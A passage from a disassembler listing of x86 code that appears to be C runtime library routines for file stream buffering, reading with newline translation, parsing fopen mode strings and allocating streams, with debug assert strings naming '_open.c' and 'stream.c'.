jz short loc_4271EB
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+4], 0FFFFFFFFh
jnz short loc_42721B
loc_4271EB: ; CODE XREF: sub_427100+E0�j
mov edx, [ebp+var_4]
mov eax, [edx+4]
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
or edx, eax
mov eax, [ebp+var_4]
mov [eax+0Ch], edx
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0
or eax, 0FFFFFFFFh
jmp loc_4272DD
; ---------------------------------------------------------------------------
loc_42721B: ; CODE XREF: sub_427100+E9�j
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 82h
test eax, eax
jnz short loc_427281
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+10h], 0FFFFFFFFh
jz short loc_427256
mov edx, [ebp+var_4]
mov eax, [edx+10h]
sar eax, 5
mov ecx, [ebp+var_4]
mov edx, [ecx+10h]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[eax*4]
add eax, edx
mov [ebp+var_8], eax
jmp short loc_42725D
; ---------------------------------------------------------------------------
loc_427256: ; CODE XREF: sub_427100+131�j
mov [ebp+var_8], offset dword_454390
loc_42725D: ; CODE XREF: sub_427100+154�j
mov ecx, [ebp+var_8]
movsx edx, byte ptr [ecx+4]
and edx, 82h
cmp edx, 82h
jnz short loc_427281
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
or ch, 20h
mov edx, [ebp+var_4]
mov [edx+0Ch], ecx
loc_427281: ; CODE XREF: sub_427100+128�j
; sub_427100+170�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+18h], 200h
jnz short loc_4272B4
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 8
test edx, edx
jz short loc_4272B4
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
and ecx, 400h
test ecx, ecx
jnz short loc_4272B4
mov edx, [ebp+var_4]
mov dword ptr [edx+18h], 1000h
loc_4272B4: ; CODE XREF: sub_427100+18B�j
; sub_427100+198�j ...
mov eax, [ebp+var_4]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+var_4]
mov [edx+4], ecx
mov eax, [ebp+var_4]
mov ecx, [eax]
movsx eax, byte ptr [ecx]
and eax, 0FFh
mov edx, [ebp+var_4]
mov ecx, [edx]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx], ecx
loc_4272DD: ; CODE XREF: sub_427100+58�j
; sub_427100+7B�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_427100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4272F0 proc near ; CODE XREF: sub_41E1C0+118�p
; sub_427100+CB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4F37C0
jnb short loc_427321
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_42733C
loc_427321: ; CODE XREF: sub_4272F0+D�j
call sub_429A90
mov dword ptr [eax], 9
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_42736E
; ---------------------------------------------------------------------------
loc_42733C: ; CODE XREF: sub_4272F0+2F�j
mov edx, [ebp+arg_0]
push edx
call sub_431070
add esp, 4
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_427380
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
call sub_431100
add esp, 4
mov eax, [ebp+var_4]
loc_42736E: ; CODE XREF: sub_4272F0+4A�j
mov esp, ebp
pop ebp
retn
sub_4272F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427380 proc near ; CODE XREF: sub_4272F0+64�p
; sub_4314E0+42F�p
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_18], 0
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
cmp [ebp+arg_8], 0
jz short loc_4273BB
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 2
test ecx, ecx
jz short loc_4273C2
loc_4273BB: ; CODE XREF: sub_427380+17�j
xor eax, eax
jmp loc_4277C1
; ---------------------------------------------------------------------------
loc_4273C2: ; CODE XREF: sub_427380+39�j
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, ds:dword_4F36C0[edx*4]
movsx edx, byte ptr [ecx+eax+4]
and edx, 48h
test edx, edx
jz short loc_427459
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
movsx eax, byte ptr [edx+ecx+5]
cmp eax, 0Ah
jz short loc_427459
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
mov ecx, [ebp+var_14]
mov dl, [eax+edx+5]
mov [ecx], dl
mov eax, [ebp+var_14]
add eax, 1
mov [ebp+var_14], eax
mov ecx, [ebp+var_18]
add ecx, 1
mov [ebp+var_18], ecx
mov edx, [ebp+arg_8]
sub edx, 1
mov [ebp+arg_8], edx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov byte ptr [edx+ecx+5], 0Ah
loc_427459: ; CODE XREF: sub_427380+62�j
; sub_427380+82�j
push 0
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov eax, [edx+ecx]
push eax
call ds:off_4F53BC
test eax, eax
jnz short loc_4274D8
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
cmp [ebp+var_8], 5
jnz short loc_4274B7
call sub_429A90
mov dword ptr [eax], 9
call sub_429AA0
mov ecx, [ebp+var_8]
mov [eax], ecx
or eax, 0FFFFFFFFh
jmp loc_4277C1
; ---------------------------------------------------------------------------
loc_4274B7: ; CODE XREF: sub_427380+118�j
cmp [ebp+var_8], 6Dh
jnz short loc_4274C4
xor eax, eax
jmp loc_4277C1
; ---------------------------------------------------------------------------
loc_4274C4: ; CODE XREF: sub_427380+13B�j
mov edx, [ebp+var_8]
push edx
call sub_4299F0
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_4277C1
; ---------------------------------------------------------------------------
loc_4274D8: ; CODE XREF: sub_427380+109�j
mov eax, [ebp+var_18]
add eax, [ebp+var_10]
mov [ebp+var_18], eax
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 80h
test ecx, ecx
jz loc_4277BE
cmp [ebp+var_10], 0
jz short loc_427554
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx]
cmp eax, 0Ah
jnz short loc_427554
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
mov cl, [eax+edx+4]
or cl, 4
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov edx, ds:dword_4F36C0[edx*4]
mov [edx+eax+4], cl
jmp short loc_42758A
; ---------------------------------------------------------------------------
loc_427554: ; CODE XREF: sub_427380+18E�j
; sub_427380+199�j
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov al, [edx+ecx+4]
and al, 0FBh
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov ecx, ds:dword_4F36C0[ecx*4]
mov [ecx+edx+4], al
loc_42758A: ; CODE XREF: sub_427380+1D2�j
mov edx, [ebp+arg_4]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
loc_427596: ; CODE XREF: sub_427380:loc_4277B0�j
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_18]
cmp [ebp+var_4], ecx
jnb loc_4277B5
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 1Ah
jnz short loc_42760E
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 40h
test ecx, ecx
jnz short loc_427609
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, ds:dword_4F36C0[edx*4]
mov dl, [ecx+eax+4]
or dl, 2
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov eax, ds:dword_4F36C0[eax*4]
mov [eax+ecx+4], dl
loc_427609: ; CODE XREF: sub_427380+250�j
jmp loc_4277B5
; ---------------------------------------------------------------------------
loc_42760E: ; CODE XREF: sub_427380+22E�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0Dh
jz short loc_42763A
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp loc_4277B0
; ---------------------------------------------------------------------------
loc_42763A: ; CODE XREF: sub_427380+297�j
mov edx, [ebp+var_18]
mov eax, [ebp+arg_4]
lea ecx, [eax+edx-1]
cmp [ebp+var_4], ecx
jnb short loc_427690
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx+1]
cmp eax, 0Ah
jnz short loc_42766F
mov ecx, [ebp+var_4]
add ecx, 2
mov [ebp+var_4], ecx
mov edx, [ebp+var_C]
mov byte ptr [edx], 0Ah
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_42768B
; ---------------------------------------------------------------------------
loc_42766F: ; CODE XREF: sub_427380+2D3�j
mov ecx, [ebp+var_C]
mov edx, [ebp+var_4]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42768B: ; CODE XREF: sub_427380+2ED�j
jmp loc_4277B0
; ---------------------------------------------------------------------------
loc_427690: ; CODE XREF: sub_427380+2C7�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov [ebp+var_8], 0
push 0
lea ecx, [ebp+var_10]
push ecx
push 1
lea edx, [ebp+var_1C]
push edx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov eax, [edx+ecx]
push eax
call ds:off_4F53BC
test eax, eax
jnz short loc_4276D9
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
loc_4276D9: ; CODE XREF: sub_427380+34E�j
cmp [ebp+var_8], 0
jnz short loc_4276E5
cmp [ebp+var_10], 0
jnz short loc_4276F9
loc_4276E5: ; CODE XREF: sub_427380+35D�j
mov ecx, [ebp+var_C]
mov byte ptr [ecx], 0Dh
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
jmp loc_4277B0
; ---------------------------------------------------------------------------
loc_4276F9: ; CODE XREF: sub_427380+363�j
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 48h
test eax, eax
jz short loc_427763
movsx ecx, [ebp+var_1C]
cmp ecx, 0Ah
jnz short loc_427735
mov edx, [ebp+var_C]
mov byte ptr [edx], 0Ah
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_427761
; ---------------------------------------------------------------------------
loc_427735: ; CODE XREF: sub_427380+3A2�j
mov ecx, [ebp+var_C]
mov byte ptr [ecx], 0Dh
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov al, [ebp+var_1C]
mov [edx+ecx+5], al
loc_427761: ; CODE XREF: sub_427380+3B3�j
jmp short loc_4277B0
; ---------------------------------------------------------------------------
loc_427763: ; CODE XREF: sub_427380+399�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+arg_4]
jnz short loc_427785
movsx edx, [ebp+var_1C]
cmp edx, 0Ah
jnz short loc_427785
mov eax, [ebp+var_C]
mov byte ptr [eax], 0Ah
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
jmp short loc_4277B0
; ---------------------------------------------------------------------------
loc_427785: ; CODE XREF: sub_427380+3E9�j
; sub_427380+3F2�j
push 1
push 0FFFFFFFFh
mov edx, [ebp+arg_0]
push edx
call sub_42E570
add esp, 0Ch
mov [ebp+var_20], eax
movsx eax, [ebp+var_1C]
cmp eax, 0Ah
jz short loc_4277B0
mov ecx, [ebp+var_C]
mov byte ptr [ecx], 0Dh
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_4277B0: ; CODE XREF: sub_427380+2B5�j
; sub_427380:loc_42768B�j ...
jmp loc_427596
; ---------------------------------------------------------------------------
loc_4277B5: ; CODE XREF: sub_427380+21F�j
; sub_427380:loc_427609�j
mov eax, [ebp+var_C]
sub eax, [ebp+arg_4]
mov [ebp+var_18], eax
loc_4277BE: ; CODE XREF: sub_427380+184�j
mov eax, [ebp+var_18]
loc_4277C1: ; CODE XREF: sub_427380+3D�j
; sub_427380+132�j ...
mov esp, ebp
pop ebp
retn
sub_427380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4277D0 proc near ; CODE XREF: sub_41E390+DB�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
mov eax, ds:dword_4F3550
mov [ebp+var_1C], eax
mov [ebp+var_18], 0
mov [ebp+var_10], 0
loc_4277EF: ; CODE XREF: sub_4277D0+47�j
cmp [ebp+arg_0], 0
jnz short loc_427813
push offset aFilenameNull ; "filename != NULL"
push 0
push 47h
push offset a_open_c ; "_open.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_427813
int 3 ; Trap to Debugger
loc_427813: ; CODE XREF: sub_4277D0+23�j
; sub_4277D0+40�j
xor ecx, ecx
test ecx, ecx
jnz short loc_4277EF
loc_427819: ; CODE XREF: sub_4277D0+71�j
cmp [ebp+arg_4], 0
jnz short loc_42783D
push offset aModeNull ; "mode != NULL"
push 0
push 48h
push offset a_open_c ; "_open.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_42783D
int 3 ; Trap to Debugger
loc_42783D: ; CODE XREF: sub_4277D0+4D�j
; sub_4277D0+6A�j
xor edx, edx
test edx, edx
jnz short loc_427819
loc_427843: ; CODE XREF: sub_4277D0+9B�j
cmp [ebp+arg_C], 0
jnz short loc_427867
push offset dword_43C514
push 0
push 49h
push offset a_open_c ; "_open.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_427867
int 3 ; Trap to Debugger
loc_427867: ; CODE XREF: sub_4277D0+77�j
; sub_4277D0+94�j
xor eax, eax
test eax, eax
jnz short loc_427843
mov ecx, [ebp+arg_4]
mov dl, [ecx]
mov [ebp+var_20], dl
cmp [ebp+var_20], 61h
jz short loc_4278AC
cmp [ebp+var_20], 72h
jz short loc_427889
cmp [ebp+var_20], 77h
jz short loc_42789A
jmp short loc_4278BE
; ---------------------------------------------------------------------------
loc_427889: ; CODE XREF: sub_4277D0+AF�j
mov [ebp+var_14], 0
mov eax, [ebp+var_1C]
or al, 1
mov [ebp+var_1C], eax
jmp short loc_4278C5
; ---------------------------------------------------------------------------
loc_42789A: ; CODE XREF: sub_4277D0+B5�j
mov [ebp+var_14], 301h
mov ecx, [ebp+var_1C]
or ecx, 2
mov [ebp+var_1C], ecx
jmp short loc_4278C5
; ---------------------------------------------------------------------------
loc_4278AC: ; CODE XREF: sub_4277D0+A9�j
mov [ebp+var_14], 109h
mov edx, [ebp+var_1C]
or edx, 2
mov [ebp+var_1C], edx
jmp short loc_4278C5
; ---------------------------------------------------------------------------
loc_4278BE: ; CODE XREF: sub_4277D0+B7�j
xor eax, eax
jmp loc_427AE6
; ---------------------------------------------------------------------------
loc_4278C5: ; CODE XREF: sub_4277D0+C8�j
; sub_4277D0+DA�j ...
mov [ebp+var_4], 1
loc_4278CC: ; CODE XREF: sub_4277D0:loc_427A6A�j
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz loc_427A6F
cmp [ebp+var_4], 0
jz loc_427A6F
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
sub edx, 2Bh
mov [ebp+var_24], edx
cmp [ebp+var_24], 49h
ja loc_427A63
mov ecx, [ebp+var_24]
xor eax, eax
mov al, byte_427B15[ecx]
jmp off_427AED[eax*4]
loc_42791B: ; DATA XREF: _0:off_427AED�o
mov edx, [ebp+var_14]
and edx, 2
test edx, edx
jz short loc_42792E
mov [ebp+var_4], 0
jmp short loc_427950
; ---------------------------------------------------------------------------
loc_42792E: ; CODE XREF: sub_4277D0+153�j
mov eax, [ebp+var_14]
or al, 2
mov [ebp+var_14], eax
mov ecx, [ebp+var_14]
and ecx, 0FFFFFFFEh
mov [ebp+var_14], ecx
mov edx, [ebp+var_1C]
or dl, 80h
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
and al, 0FCh
mov [ebp+var_1C], eax
loc_427950: ; CODE XREF: sub_4277D0+15C�j
jmp loc_427A6A
; ---------------------------------------------------------------------------
loc_427955: ; CODE XREF: sub_4277D0+144�j
; DATA XREF: _0:00427B01�o
mov ecx, [ebp+var_14]
and ecx, 0C000h
test ecx, ecx
jz short loc_42796B
mov [ebp+var_4], 0
jmp short loc_427974
; ---------------------------------------------------------------------------
loc_42796B: ; CODE XREF: sub_4277D0+190�j
mov edx, [ebp+var_14]
or dh, 80h
mov [ebp+var_14], edx
loc_427974: ; CODE XREF: sub_4277D0+199�j
jmp loc_427A6A
; ---------------------------------------------------------------------------
loc_427979: ; CODE XREF: sub_4277D0+144�j
; DATA XREF: _0:00427B0D�o
mov eax, [ebp+var_14]
and eax, 0C000h
test eax, eax
jz short loc_42798E
mov [ebp+var_4], 0
jmp short loc_427997
; ---------------------------------------------------------------------------
loc_42798E: ; CODE XREF: sub_4277D0+1B3�j
mov ecx, [ebp+var_14]
or ch, 40h
mov [ebp+var_14], ecx
loc_427997: ; CODE XREF: sub_4277D0+1BC�j
jmp loc_427A6A
; ---------------------------------------------------------------------------
loc_42799C: ; CODE XREF: sub_4277D0+144�j
; DATA XREF: _0:00427B05�o
cmp [ebp+var_18], 0
jz short loc_4279AB
mov [ebp+var_4], 0
jmp short loc_4279BB
; ---------------------------------------------------------------------------
loc_4279AB: ; CODE XREF: sub_4277D0+1D0�j
mov [ebp+var_18], 1
mov edx, [ebp+var_1C]
or dh, 40h
mov [ebp+var_1C], edx
loc_4279BB: ; CODE XREF: sub_4277D0+1D9�j
jmp loc_427A6A
; ---------------------------------------------------------------------------
loc_4279C0: ; CODE XREF: sub_4277D0+144�j
; DATA XREF: _0:00427B09�o
cmp [ebp+var_18], 0
jz short loc_4279CF
mov [ebp+var_4], 0
jmp short loc_4279DF
; ---------------------------------------------------------------------------
loc_4279CF: ; CODE XREF: sub_4277D0+1F4�j
mov [ebp+var_18], 1
mov eax, [ebp+var_1C]
and ah, 0BFh
mov [ebp+var_1C], eax
loc_4279DF: ; CODE XREF: sub_4277D0+1FD�j
jmp loc_427A6A
; ---------------------------------------------------------------------------
loc_4279E4: ; CODE XREF: sub_4277D0+144�j
; DATA XREF: _0:00427AF9�o
cmp [ebp+var_10], 0
jz short loc_4279F3
mov [ebp+var_4], 0
jmp short loc_427A03
; ---------------------------------------------------------------------------
loc_4279F3: ; CODE XREF: sub_4277D0+218�j
mov [ebp+var_10], 1
mov ecx, [ebp+var_14]
or ecx, 20h
mov [ebp+var_14], ecx
loc_427A03: ; CODE XREF: sub_4277D0+221�j
jmp short loc_427A6A
; ---------------------------------------------------------------------------
loc_427A05: ; CODE XREF: sub_4277D0+144�j
; DATA XREF: _0:00427AF5�o
cmp [ebp+var_10], 0
jz short loc_427A14
mov [ebp+var_4], 0
jmp short loc_427A24
; ---------------------------------------------------------------------------
loc_427A14: ; CODE XREF: sub_4277D0+239�j
mov [ebp+var_10], 1
mov edx, [ebp+var_14]
or edx, 10h
mov [ebp+var_14], edx
loc_427A24: ; CODE XREF: sub_4277D0+242�j
jmp short loc_427A6A
; ---------------------------------------------------------------------------
loc_427A26: ; CODE XREF: sub_4277D0+144�j
; DATA XREF: _0:00427AFD�o
mov eax, [ebp+var_14]
and eax, 1000h
test eax, eax
jz short loc_427A3B
mov [ebp+var_4], 0
jmp short loc_427A44
; ---------------------------------------------------------------------------
loc_427A3B: ; CODE XREF: sub_4277D0+260�j
mov ecx, [ebp+var_14]
or ch, 10h
mov [ebp+var_14], ecx
loc_427A44: ; CODE XREF: sub_4277D0+269�j
jmp short loc_427A6A
; ---------------------------------------------------------------------------
loc_427A46: ; CODE XREF: sub_4277D0+144�j
; DATA XREF: _0:00427AF1�o
mov edx, [ebp+var_14]
and edx, 40h
test edx, edx
jz short loc_427A59
mov [ebp+var_4], 0
jmp short loc_427A61
; ---------------------------------------------------------------------------
loc_427A59: ; CODE XREF: sub_4277D0+27E�j
mov eax, [ebp+var_14]
or al, 40h
mov [ebp+var_14], eax
loc_427A61: ; CODE XREF: sub_4277D0+287�j
jmp short loc_427A6A
; ---------------------------------------------------------------------------
loc_427A63: ; CODE XREF: sub_4277D0+133�j
; sub_4277D0+144�j
; DATA XREF: ...
mov [ebp+var_4], 0
loc_427A6A: ; CODE XREF: sub_4277D0:loc_427950�j
; sub_4277D0:loc_427974�j ...
jmp loc_4278CC
; ---------------------------------------------------------------------------
loc_427A6F: ; CODE XREF: sub_4277D0+10D�j
; sub_4277D0+117�j
push 1A4h
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_4314E0
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jge short loc_427A95
xor eax, eax
jmp short loc_427AE6
; ---------------------------------------------------------------------------
loc_427A95: ; CODE XREF: sub_4277D0+2BF�j
mov ecx, ds:dword_4F336C
add ecx, 1
mov ds:dword_4F336C, ecx
mov edx, [ebp+arg_C]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_1C]
mov [eax+0Ch], ecx
mov edx, [ebp+var_C]
mov dword ptr [edx+4], 0
mov eax, [ebp+var_C]
mov dword ptr [eax], 0
mov ecx, [ebp+var_C]
mov dword ptr [ecx+8], 0
mov edx, [ebp+var_C]
mov dword ptr [edx+1Ch], 0
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax+10h], ecx
mov eax, [ebp+var_C]
loc_427AE6: ; CODE XREF: sub_4277D0+F0�j
; sub_4277D0+2C3�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4277D0 endp
; ---------------------------------------------------------------------------
off_427AED dd offset loc_42791B ; DATA XREF: sub_4277D0+144�r
dd offset loc_427A46
dd offset loc_427A05
dd offset loc_4279E4
dd offset loc_427A26
dd offset loc_427955
dd offset loc_42799C
dd offset loc_4279C0
dd offset loc_427979
dd offset loc_427A63
byte_427B15 db 0 ; DATA XREF: sub_4277D0+13E�r
dw 909h
dd 5 dup(9090909h), 9010909h, 3 dup(9090909h), 9040302h
dd 3 dup(9090909h), 9090605h, 2 dup(9090909h), 9090907h
dd 0CC080909h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427B60 proc near ; CODE XREF: sub_41E390+B9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 0
push 2
call sub_423280
add esp, 4
mov [ebp+var_4], 0
jmp short loc_427B89
; ---------------------------------------------------------------------------
loc_427B80: ; CODE XREF: sub_427B60+A8�j
; sub_427B60:loc_427C89�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_427B89: ; CODE XREF: sub_427B60+1E�j
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_4F4A20
jge loc_427C8E
mov edx, [ebp+var_4]
mov eax, ds:dword_4F3A14
cmp dword ptr [eax+edx*4], 0
jz short loc_427C1F
mov ecx, [ebp+var_4]
mov edx, ds:dword_4F3A14
mov eax, [edx+ecx*4]
mov ecx, [eax+0Ch]
and ecx, 83h
test ecx, ecx
jnz short loc_427C1D
mov edx, [ebp+var_4]
mov eax, ds:dword_4F3A14
mov ecx, [eax+edx*4]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_422460
add esp, 8
mov eax, [ebp+var_4]
mov ecx, ds:dword_4F3A14
mov edx, [ecx+eax*4]
mov eax, [edx+0Ch]
and eax, 83h
test eax, eax
jz short loc_427C0D
mov ecx, [ebp+var_4]
mov edx, ds:dword_4F3A14
mov eax, [edx+ecx*4]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_4224D0
add esp, 8
jmp loc_427B80
; ---------------------------------------------------------------------------
loc_427C0D: ; CODE XREF: sub_427B60+8D�j
mov edx, [ebp+var_4]
mov eax, ds:dword_4F3A14
mov ecx, [eax+edx*4]
mov [ebp+var_8], ecx
jmp short loc_427C8E
; ---------------------------------------------------------------------------
loc_427C1D: ; CODE XREF: sub_427B60+5D�j
jmp short loc_427C89
; ---------------------------------------------------------------------------
loc_427C1F: ; CODE XREF: sub_427B60+44�j
push 55h
push offset aStream_c ; "stream.c"
push 2
push 38h
call sub_41BE70
add esp, 10h
mov edx, [ebp+var_4]
mov ecx, ds:dword_4F3A14
mov [ecx+edx*4], eax
mov edx, [ebp+var_4]
mov eax, ds:dword_4F3A14
cmp dword ptr [eax+edx*4], 0
jz short loc_427C87
mov ecx, [ebp+var_4]
mov edx, ds:dword_4F3A14
mov eax, [edx+ecx*4]
add eax, 20h
push eax
call ds:dword_4F54A4 ; InitializeCriticalSection
mov ecx, [ebp+var_4]
mov edx, ds:dword_4F3A14
mov eax, [edx+ecx*4]
add eax, 20h
push eax
call ds:dword_4F53A8 ; RtlEnterCriticalSection
mov ecx, [ebp+var_4]
mov edx, ds:dword_4F3A14
mov eax, [edx+ecx*4]
mov [ebp+var_8], eax
loc_427C87: ; CODE XREF: sub_427B60+EA�j
jmp short loc_427C8E
; ---------------------------------------------------------------------------
loc_427C89: ; CODE XREF: sub_427B60:loc_427C1D�j
jmp loc_427B80
; ---------------------------------------------------------------------------
loc_427C8E: ; CODE XREF: sub_427B60+32�j
; sub_427B60+BB�j ...
cmp [ebp+var_8], 0
jz short loc_427CCF
mov ecx, [ebp+var_8]
mov dword ptr [ecx+4], 0
mov edx, [ebp+var_8]
mov dword ptr [edx+0Ch], 0
mov eax, [ebp+var_8]
mov dword ptr [eax+8], 0
mov ecx, [ebp+var_8]
mov dword ptr [ecx], 0
mov edx, [ebp+var_8]
mov dword ptr [edx+1Ch], 0
mov eax, [ebp+var_8]
mov dword ptr [eax+10h], 0FFFFFFFFh
loc_427CCF: ; CODE XREF: sub_427B60+132�j
push 2
call sub_423320
add esp, 4
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_427B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
